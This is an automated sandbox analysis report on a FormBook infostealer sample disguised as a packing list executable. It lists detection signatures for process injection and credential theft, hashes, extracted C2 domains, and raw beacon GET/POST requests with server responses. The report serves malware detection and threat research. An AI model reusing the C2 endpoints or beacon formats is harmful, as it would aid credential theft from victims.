Windows Analysis Report
PI & PACKING LIST.exe

Overview

General Information

Sample Name: PI & PACKING LIST.exe
Analysis ID: 756334
MD5: 36fbb21511e87e8dddc8916cc2dc9367
SHA1: eda2fa3fe4b62fe3d564cf492cc31a875e8f1922
SHA256: 937c7c476bb363e55fdf1ff275c87de91ec0f550072e9a759387cc95e6c78c83
Tags: exe, formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Deletes itself after installation
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection

Source: PI & PACKING LIST.exe ReversingLabs: Detection: 76%
Source: PI & PACKING LIST.exe Virustotal: Detection: 57%
Source: Yara match File source: 00000003.00000000.345082941.000000001030A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.512821683.0000000003510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.326684434.000000001030A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.353260864.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.512567942.0000000001330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.509273886.0000000000EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: http://www.cpitherapy.com/m5oe/?l48xI=Kdt0ttn6jBvm5dVCPGsq4sF6gZwVhJORDr+IW0q2lJvFs7kzNd/E4xjIZ8hkWN2nAiXaUCaRapMtLMo79OBUYLpofMwqWu/G3g==&y8dt=cR-TJP3pr48 Avira URL Cloud: Label: malware
Source: http://www.zkjk888.com/m5oe/?l48xI=lXL2hA4gPGXGkrsXCHLs63wEyc6+ZxTcosJkE7OIAbbgzBCGQ1RLZhLXXwLUr0PxIclnwkI7OF+QM6Klss4VWWvRg6rabD2uNg==&y8dt=cR-TJP3pr48 Avira URL Cloud: Label: malware
Source: http://www.bengalindex.com/m5oe/ Avira URL Cloud: Label: malware
Source: http://www.nu2uresale.store/m5oe/?l48xI=U9+cid+ik5YJF3jF27GFdJRqVXeG7FP+UvbSj6ZytGipCLvwOYSuUs/u1hqVfurTuH6/pVSyY1dCVh8DyPcg4wzd/AwTcksoYQ==&y8dt=cR-TJP3pr48 Avira URL Cloud: Label: malware
Source: http://www.nu2uresale.store/m5oe/ Avira URL Cloud: Label: malware
Source: http://www.p-soils.com/m5oe/?l48xI=OgbUJyD2Cs0iavfQBCvIOQvZdrfaRUMlkbnSDVoQDO79KZkwY+JyOZ2XW8xl2hee24/cs1yqqL6PnYlAwwwxD54r6/IzPRoMsg==&y8dt=cR-TJP3pr48 Avira URL Cloud: Label: malware
Source: http://www.bengalindex.com/m5oe/?l48xI=yrQlZi/yeQekXtziTibn9LfL5FHN0Y47PbY+gegrHfqcLEwJAZ2lhKdA1OTtZbcFcNKVJgIODn1wmw2XGX+PWpMZIoIdVyV5wA==&y8dt=cR-TJP3pr48 Avira URL Cloud: Label: malware
Source: http://www.p-soils.com/m5oe/ Avira URL Cloud: Label: malware
Source: http://www.cpitherapy.com/m5oe/ Avira URL Cloud: Label: malware
Source: PI & PACKING LIST.exe Joe Sandbox ML: detected
Source: 0000000D.00000002.512821683.0000000003510000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.singglostudio.com/m5oe/"]}
Source: PI & PACKING LIST.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: PI & PACKING LIST.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: wntdll.pdbUGP source: PI & PACKING LIST.exe, 00000002.00000002.354114112.0000000001210000.00000040.00000800.00020000.00000000.sdmp, PI & PACKING LIST.exe, 00000002.00000003.260987211.0000000001072000.00000004.00000800.00020000.00000000.sdmp, PI & PACKING LIST.exe, 00000002.00000003.259137326.0000000000EDE000.00000004.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000002.514714921.0000000004EB0000.00000040.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000003.353323429.0000000004B74000.00000004.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000002.515759584.0000000004FCF000.00000040.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000003.355819858.0000000004D15000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: PI & PACKING LIST.exe, PI & PACKING LIST.exe, 00000002.00000002.354114112.0000000001210000.00000040.00000800.00020000.00000000.sdmp, PI & PACKING LIST.exe, 00000002.00000003.260987211.0000000001072000.00000004.00000800.00020000.00000000.sdmp, PI & PACKING LIST.exe, 00000002.00000003.259137326.0000000000EDE000.00000004.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000002.514714921.0000000004EB0000.00000040.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000003.353323429.0000000004B74000.00000004.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000002.515759584.0000000004FCF000.00000040.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000003.355819858.0000000004D15000.00000004.00000800.00020000.00000000.sdmp

Networking

Source: C:\Windows\explorer.exe Network Connect: 35.78.89.117 80
Source: C:\Windows\explorer.exe Network Connect: 162.43.120.154 80
Source: C:\Windows\explorer.exe Network Connect: 142.250.203.115 80
Source: C:\Windows\explorer.exe Domain query: www.bengalindex.com
Source: C:\Windows\explorer.exe Domain query: www.nu2uresale.store
Source: C:\Windows\explorer.exe Network Connect: 209.99.64.33 80
Source: C:\Windows\explorer.exe Domain query: www.zkjk888.com
Source: C:\Windows\explorer.exe Network Connect: 178.128.239.245 80
Source: C:\Windows\explorer.exe Domain query: www.p-soils.com
Source: C:\Windows\explorer.exe Domain query: www.cpitherapy.com
Source: C:\Windows\explorer.exe Domain query: www.gebouwpas.online
Source: Malware configuration extractor URLs: www.singglostudio.com/m5oe/
Source: Joe Sandbox View ASN Name: AMAZON-02US AMAZON-02US
Source: global traffic HTTP traffic detected: GET /m5oe/?l48xI=lXL2hA4gPGXGkrsXCHLs63wEyc6+ZxTcosJkE7OIAbbgzBCGQ1RLZhLXXwLUr0PxIclnwkI7OF+QM6Klss4VWWvRg6rabD2uNg==&y8dt=cR-TJP3pr48 HTTP/1.1
  Host: www.zkjk888.com
  Connection: close
Source: global traffic HTTP traffic detected: GET /m5oe/?l48xI=Kdt0ttn6jBvm5dVCPGsq4sF6gZwVhJORDr+IW0q2lJvFs7kzNd/E4xjIZ8hkWN2nAiXaUCaRapMtLMo79OBUYLpofMwqWu/G3g==&y8dt=cR-TJP3pr48 HTTP/1.1
  Host: www.cpitherapy.com
  Connection: close
Source: global traffic HTTP traffic detected: GET /m5oe/?l48xI=OgbUJyD2Cs0iavfQBCvIOQvZdrfaRUMlkbnSDVoQDO79KZkwY+JyOZ2XW8xl2hee24/cs1yqqL6PnYlAwwwxD54r6/IzPRoMsg==&y8dt=cR-TJP3pr48 HTTP/1.1
  Host: www.p-soils.com
  Connection: close
Source: global traffic HTTP traffic detected: GET /m5oe/?l48xI=yrQlZi/yeQekXtziTibn9LfL5FHN0Y47PbY+gegrHfqcLEwJAZ2lhKdA1OTtZbcFcNKVJgIODn1wmw2XGX+PWpMZIoIdVyV5wA==&y8dt=cR-TJP3pr48 HTTP/1.1
  Host: www.bengalindex.com
  Connection: close
Source: global traffic HTTP traffic detected: GET /m5oe/?l48xI=U9+cid+ik5YJF3jF27GFdJRqVXeG7FP+UvbSj6ZytGipCLvwOYSuUs/u1hqVfurTuH6/pVSyY1dCVh8DyPcg4wzd/AwTcksoYQ==&y8dt=cR-TJP3pr48 HTTP/1.1
  Host: www.nu2uresale.store
  Connection: close
Source: global traffic HTTP traffic detected: POST /m5oe/ HTTP/1.1
  Host: www.cpitherapy.com
  Connection: close
  Content-Length: 187
  Cache-Control: no-cache
  Origin: http://www.cpitherapy.com
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://www.cpitherapy.com/m5oe/
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
Source: global traffic HTTP traffic detected: POST /m5oe/ HTTP/1.1
  Host: www.cpitherapy.com
  Connection: close
  Content-Length: 5335
  Cache-Control: no-cache
  Origin: http://www.cpitherapy.com
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://www.cpitherapy.com/m5oe/
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
Source: global traffic HTTP traffic detected: POST /m5oe/ HTTP/1.1
  Host: www.p-soils.com
  Connection: close
  Content-Length: 187
  Cache-Control: no-cache
  Origin: http://www.p-soils.com
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://www.p-soils.com/m5oe/
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
Source: global traffic HTTP traffic detected: POST /m5oe/ HTTP/1.1
  Host: www.p-soils.com
  Connection: close
  Content-Length: 5335
  Cache-Control: no-cache
  Origin: http://www.p-soils.com
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://www.p-soils.com/m5oe/
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
Source: global traffic HTTP traffic detected: POST /m5oe/ HTTP/1.1
  Host: www.bengalindex.com
  Connection: close
  Content-Length: 187
  Cache-Control: no-cache
  Origin: http://www.bengalindex.com
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://www.bengalindex.com/m5oe/
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
Source: global traffic HTTP traffic detected: POST /m5oe/ HTTP/1.1
  Host: www.bengalindex.com
  Connection: close
  Content-Length: 5335
  Cache-Control: no-cache
  Origin: http://www.bengalindex.com
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://www.bengalindex.com/m5oe/
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
Source: global traffic HTTP traffic detected: POST /m5oe/ HTTP/1.1
  Host: www.nu2uresale.store
  Connection: close
  Content-Length: 187
  Cache-Control: no-cache
  Origin: http://www.nu2uresale.store
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://www.nu2uresale.store/m5oe/
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
Source: global traffic HTTP traffic detected: POST /m5oe/ HTTP/1.1
  Host: www.nu2uresale.store
  Connection: close
  Content-Length: 5335
  Cache-Control: no-cache
  Origin: http://www.nu2uresale.store
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://www.nu2uresale.store/m5oe/
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
  Server: nginx
  Date: Wed, 30 Nov 2022 00:56:30 GMT
  Content-Type: text/html
  Content-Length: 1277
  Connection: close
  ETag: "6373c172-4fd"
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
  Date: Wed, 30 Nov 2022 00:56:36 GMT
  Server: Apache/2.4.38 (Debian)
  Content-Length: 280
  Connection: close
  Content-Type: text/html; charset=iso-8859-1
  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.38 (Debian) Server at www.cpitherapy.com Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
  Date: Wed, 30 Nov 2022 00:56:38 GMT
  Server: Apache/2.4.38 (Debian)
  Content-Length: 280
  Connection: close
  Content-Type: text/html; charset=iso-8859-1
  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.38 (Debian) Server at www.cpitherapy.com Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
  Date: Wed, 30 Nov 2022 00:56:40 GMT
  Server: Apache/2.4.38 (Debian)
  Content-Length: 280
  Connection: close
  Content-Type: text/html; charset=iso-8859-1
  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.38 (Debian) Server at www.cpitherapy.com Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 30 Nov 2022 00:56:46 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Fri, 01 Apr 2022 06:50:17 GMTETag: W/"afe-5db9230fabf0d"Content-Encoding: gzipData Raw: 35 31 39 0d 0a 1f 8b 08 00 00 00 00 00 04 03 8d 56 cf 6f 13 47 14 3e 7b ff 8a 61 a3 4a 25 ca 66 63 27 71 a8 b1 ad 4a 10 0a 2d 90 08 4a a1 a7 6a bc 3b b6 a7 ac 77 ac dd 75 12 b7 ca 1f 63 32 53 d1 12 95 08 50 49 0a 88 aa a0 36 4d 4b 28 ad 82 2a 0e a0 aa 97 26 d0 0b 51 a5 1e fb 66 67 d6 5e 27 06 b1 17 7b df cf ef 7d ef cd db 29 1e 38 3a 73 e4 c3 8f 67 a7 51 3d 6a 78 65 a3 28 7f 90 87 fd 5a c9 fc 14 9b 52 40 b0 0b 3f 0d 12 61 e4 d4 71 10 92 a8 64 4e 9f 3b 62 bd 3f 6b 22 1b 34 11 8d 3c 52 9e 18 9b 40 c7 a8 47 d0 69 16 a1 63 ac e5 bb 45 5b 69 b4 af 8f 1b a4 64 3a ac d9 0e 68 ad 1e 99 c8 61 7e 44 7c 08 76 24 91 a1 0b 67 a7 cf 7c 34 7d 06 9d f0 9d 51 99 3b 4e aa 1c 03 56 61 51 98 f2 3a 71 fa e8 f4 85 91 63 33 27 4f ce 9c 57 40 52 d6 73 94 cc 37 59 90 ce 32 4f dd a8 5e 72 c9 1c 75 88 15 bf 8c 50 9f 46 14 7b 56 e8 60 8f 94 b2 a3 63 23 0d 10 35 5a 8d 9e 44 a2 08 a3 36 d4 15 b5 9b 80 3f 22 0b 91 ed 84 21 c8 87 d1 e7 06 82 a7 81 83 1a f5 0b 68 ec 70 fc da c4 ae 4b fd 5a fc be 68 d0 46 4d 9b 55 58 e0 92 40 8b 5b 9e 96 6a 6b cb 23 d5 a8 80 72 a4 71 d8 58 34 e2 1e a8 e0 6c 8e 04 55 8f cd 5b ed 02 0a 9d 80 79 9e ca 52 c1 ce c5 5a 20 69 2e a0 a1 f1 ca d4 3b 95 29 e9 59 61 6e 5b 47 ae 02 bd 56 15 37 a8 07 ae a6 f8 53 70 b1 23 be 32 47 d0 29 42 83 36 1b 41 e6 d2 83 a5 df d1 d2 af e2 86 b8 29 ee 89 ab a0 32 4f 9d 45 b3 ef b1 a8 4e 1d f9 26 7e 13 db e2 6b b1 79 fd 91 b8 81 66 03 86 ce 8f 4b f1 71 1a 60 a8 98 a1 0f f0 c5 16 52 e6 52 0d ba 10 fb a1 15 92 80 56 15 cc 3d dc 78 d4 27 56 9d c8 fe 17 50 76 74 42 19 c5 48 43 fa 19 29 a0 a9 c9 b7 94 4c f2 6c 61 8f d6 80 58 07 a6 84 04 4a ee 30 8f 01 89 f3 75 1a 91 98 aa 6c ba 5c 15 24 37 d1 5c 48 45 9e d7 f9 2a cc 73 f7 bb f4 6b 65 3f fb 41 aa 
40 49 9b 60 06 23 d6 80 46 8d f5 a5 48 68 3e 4e bc 39 12 51 07 f7 33 01 1d cd 69 98 af aa 2b e6 60 3f 96 14 35 b9 29 99 72 d1 68 be 49 24 45 44 b6 4b c4 9e 3e a4 67 54 96 bc 97 d5 51 b2 d0 f4 30 f5 75 2a 35 ba 56 c4 9a d0 b5 e6 02 0a 99 47 5d 34 54 ad ea 2e 6b 7d 42 ce 20 93 7e 52 47 27 15 ad 09 ac 71 a0 13 e1 56 c4 fa d8 86 64 ba e6 21 07 b7 42 32 a0 70 79 6c 24 29 da c0 a3 da 46 17 34 94 cf e7 e3 96 8f 6b b9 47 22 18 25 2b 6c 62 27 3e a3 00 f5 95 93 22 89 49 13 05 59 e2 b1 fb a4 c2 16 74 b8 04 7f 76 52 e3 4f 96 40 ef 78 5a 7b b9 35 ec 61 54 1a f0 18 b0 3d c4 9a 78 da b9 2d d6 c5 96 f8 52 ec 1a c6 00 33 29 42 c3 b6 f1 6e 83 b8 14 23 e6 7b 6d b9 18 08 f1 11 f6 5d f4 36 6c 30 b5 dd 60 d3 1c d4 22 bc 90 88 a6 f2 c0 e8 41 40 9f 19 aa e0 98 d1 4c a6 5b 63 dc 85 6c 3c d9 99 45 23 53 97 47 2b 93 49 8f 60 5e d2 a5 75 c0 a1 9c 8f 3e 83 7c cf 59 0e 7c 9f 2e db 75 4e 4d 57 bf 45 3c ae 71 78 d9 af 4c 46 d1 ab e6 6e 02 28 86 dc 69 38 bd 88 dd f9 48 55 a3 8e 68 bf 43 4e e3 5f 34 5e d7 05 24 1e 89 3b e2 ba d8 ed fc 2b ee 8a c7
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 30 Nov 2022 00:56:49 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Fri, 01 Apr 2022 06:50:17 GMTETag: W/"afe-5db9230fabf0d"Content-Encoding: gzipData Raw: 35 31 39 0d 0a 1f 8b 08 00 00 00 00 00 04 03 8d 56 cf 6f 13 47 14 3e 7b ff 8a 61 a3 4a 25 ca 66 63 27 71 a8 b1 ad 4a 10 0a 2d 90 08 4a a1 a7 6a bc 3b b6 a7 ac 77 ac dd 75 12 b7 ca 1f 63 32 53 d1 12 95 08 50 49 0a 88 aa a0 36 4d 4b 28 ad 82 2a 0e a0 aa 97 26 d0 0b 51 a5 1e fb 66 67 d6 5e 27 06 b1 17 7b df cf ef 7d ef cd db 29 1e 38 3a 73 e4 c3 8f 67 a7 51 3d 6a 78 65 a3 28 7f 90 87 fd 5a c9 fc 14 9b 52 40 b0 0b 3f 0d 12 61 e4 d4 71 10 92 a8 64 4e 9f 3b 62 bd 3f 6b 22 1b 34 11 8d 3c 52 9e 18 9b 40 c7 a8 47 d0 69 16 a1 63 ac e5 bb 45 5b 69 b4 af 8f 1b a4 64 3a ac d9 0e 68 ad 1e 99 c8 61 7e 44 7c 08 76 24 91 a1 0b 67 a7 cf 7c 34 7d 06 9d f0 9d 51 99 3b 4e aa 1c 03 56 61 51 98 f2 3a 71 fa e8 f4 85 91 63 33 27 4f ce 9c 57 40 52 d6 73 94 cc 37 59 90 ce 32 4f dd a8 5e 72 c9 1c 75 88 15 bf 8c 50 9f 46 14 7b 56 e8 60 8f 94 b2 a3 63 23 0d 10 35 5a 8d 9e 44 a2 08 a3 36 d4 15 b5 9b 80 3f 22 0b 91 ed 84 21 c8 87 d1 e7 06 82 a7 81 83 1a f5 0b 68 ec 70 fc da c4 ae 4b fd 5a fc be 68 d0 46 4d 9b 55 58 e0 92 40 8b 5b 9e 96 6a 6b cb 23 d5 a8 80 72 a4 71 d8 58 34 e2 1e a8 e0 6c 8e 04 55 8f cd 5b ed 02 0a 9d 80 79 9e ca 52 c1 ce c5 5a 20 69 2e a0 a1 f1 ca d4 3b 95 29 e9 59 61 6e 5b 47 ae 02 bd 56 15 37 a8 07 ae a6 f8 53 70 b1 23 be 32 47 d0 29 42 83 36 1b 41 e6 d2 83 a5 df d1 d2 af e2 86 b8 29 ee 89 ab a0 32 4f 9d 45 b3 ef b1 a8 4e 1d f9 26 7e 13 db e2 6b b1 79 fd 91 b8 81 66 03 86 ce 8f 4b f1 71 1a 60 a8 98 a1 0f f0 c5 16 52 e6 52 0d ba 10 fb a1 15 92 80 56 15 cc 3d dc 78 d4 27 56 9d c8 fe 17 50 76 74 42 19 c5 48 43 fa 19 29 a0 a9 c9 b7 94 4c f2 6c 61 8f d6 80 58 07 a6 84 04 4a ee 30 8f 01 89 f3 75 1a 91 98 aa 6c ba 5c 15 24 37 d1 5c 48 45 9e d7 f9 2a cc 73 f7 bb f4 6b 65 3f fb 41 aa 
40 49 9b 60 06 23 d6 80 46 8d f5 a5 48 68 3e 4e bc 39 12 51 07 f7 33 01 1d cd 69 98 af aa 2b e6 60 3f 96 14 35 b9 29 99 72 d1 68 be 49 24 45 44 b6 4b c4 9e 3e a4 67 54 96 bc 97 d5 51 b2 d0 f4 30 f5 75 2a 35 ba 56 c4 9a d0 b5 e6 02 0a 99 47 5d 34 54 ad ea 2e 6b 7d 42 ce 20 93 7e 52 47 27 15 ad 09 ac 71 a0 13 e1 56 c4 fa d8 86 64 ba e6 21 07 b7 42 32 a0 70 79 6c 24 29 da c0 a3 da 46 17 34 94 cf e7 e3 96 8f 6b b9 47 22 18 25 2b 6c 62 27 3e a3 00 f5 95 93 22 89 49 13 05 59 e2 b1 fb a4 c2 16 74 b8 04 7f 76 52 e3 4f 96 40 ef 78 5a 7b b9 35 ec 61 54 1a f0 18 b0 3d c4 9a 78 da b9 2d d6 c5 96 f8 52 ec 1a c6 00 33 29 42 c3 b6 f1 6e 83 b8 14 23 e6 7b 6d b9 18 08 f1 11 f6 5d f4 36 6c 30 b5 dd 60 d3 1c d4 22 bc 90 88 a6 f2 c0 e8 41 40 9f 19 aa e0 98 d1 4c a6 5b 63 dc 85 6c 3c d9 99 45 23 53 97 47 2b 93 49 8f 60 5e d2 a5 75 c0 a1 9c 8f 3e 83 7c cf 59 0e 7c 9f 2e db 75 4e 4d 57 bf 45 3c ae 71 78 d9 af 4c 46 d1 ab e6 6e 02 28 86 dc 69 38 bd 88 dd f9 48 55 a3 8e 68 bf 43 4e e3 5f 34 5e d7 05 24 1e 89 3b e2 ba d8 ed fc 2b ee 8a c7
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 30 Nov 2022 00:56:51 GMTContent-Type: text/htmlContent-Length: 2814Connection: closeVary: Accept-EncodingLast-Modified: Fri, 01 Apr 2022 06:50:17 GMTETag: "afe-5db9230fabf0d"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 45 55 43 2d 4a 50 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 46 69 6c 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 58 53 45 52 56 45 52 20 49 6e 63 2e 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 4e 44 45 58 2c 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 2a 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 7d 0a 69 6d 67 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 3a 20 30 3b 0a 7d 0a 75 6c 20 7b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 32 65 6d 3b 0a 7d 0a 68 74 6d 6c 20 7b 0a 20 20 20 20 6f 76 65 72 66 6c 6f 77 2d 79 3a 20 73 63 72 6f 6c 6c 3b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 33 62 37 39 62 37 3b 0a 7d 0a 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 a5 e1 a5 a4 a5 ea a5 aa 22 2c 20 4d 65 69 72 79 6f 2c 20 22 a3 cd a3 d3 20 a3 d0 a5 b4 a5 b7 a5 c3 a5 af 22 2c 20 22 4d 53 20 50 47 6f 74 68 69 63 22 2c 20 22 a5 d2 a5 e9 a5 ae a5 ce b3 d1 a5 b4 20 50 72 6f 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 
61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 37 35 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 68 32 20 7b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6
Source: control.exe, 0000000D.00000002.517236136.0000000005748000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://35.78.89.117
Source: control.exe, 0000000D.00000002.517236136.0000000005748000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://amh.sh
Source: control.exe, 0000000D.00000002.517236136.0000000005748000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://amh.sh/
Source: PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://fontfabrik.com
Source: PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000003.00000000.292294807.000000000F270000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.323770993.000000000F270000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.coml
